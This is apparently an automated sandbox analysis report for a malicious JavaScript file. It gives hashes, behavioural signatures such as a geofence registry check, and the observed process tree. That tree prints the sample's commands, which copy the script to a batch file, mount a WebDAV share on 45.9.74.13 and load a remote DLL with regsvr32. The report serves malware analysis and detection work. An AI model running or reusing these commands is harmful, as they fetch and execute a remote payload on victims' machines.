Analysis
-
max time kernel
93s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09/07/2024, 08:01
Static task
static1
Behavioral task
behavioral1
Sample
8229244422874715833.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
8229244422874715833.js
Resource
win10v2004-20240704-en
General
-
Target
8229244422874715833.js
-
Size
5KB
-
MD5
df5bf4caa9380cea0628600ba750c20a
-
SHA1
1a5b7f44220582f28bc41f538a32dba02b3e6abe
-
SHA256
fb7898c47cd72c206f2b9a802225f5533202047fd1621bf71ccff4a3f8862616
-
SHA512
a10d14c64a6605350ed75488e40041ff8f3b13b9b14fab63e53a5874a9fcae63faabb191fdeee58a570d03623020b0a9851f43a93b22cbdcb6d77319a13238c1
-
SSDEEP
96:GrxokPB6nsWLQQKU0wiKoLHZ08KZLZ0ocA5Rbk7Ru:Grxoz8XU0hZHZ08KZLZ0ocmRbk7Ru
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2072 wrote to memory of 4436 2072 wscript.exe 82 PID 2072 wrote to memory of 4436 2072 wscript.exe 82 PID 4436 wrote to memory of 1116 4436 cmd.exe 85 PID 4436 wrote to memory of 1116 4436 cmd.exe 85 PID 4436 wrote to memory of 1884 4436 cmd.exe 86 PID 4436 wrote to memory of 1884 4436 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\8229244422874715833.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\8229244422874715833.js" "C:\Users\Admin\\npumvs.bat" && "C:\Users\Admin\\npumvs.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:1116
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\65.dll3⤵PID:1884
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5df5bf4caa9380cea0628600ba750c20a
SHA11a5b7f44220582f28bc41f538a32dba02b3e6abe
SHA256fb7898c47cd72c206f2b9a802225f5533202047fd1621bf71ccff4a3f8862616
SHA512a10d14c64a6605350ed75488e40041ff8f3b13b9b14fab63e53a5874a9fcae63faabb191fdeee58a570d03623020b0a9851f43a93b22cbdcb6d77319a13238c1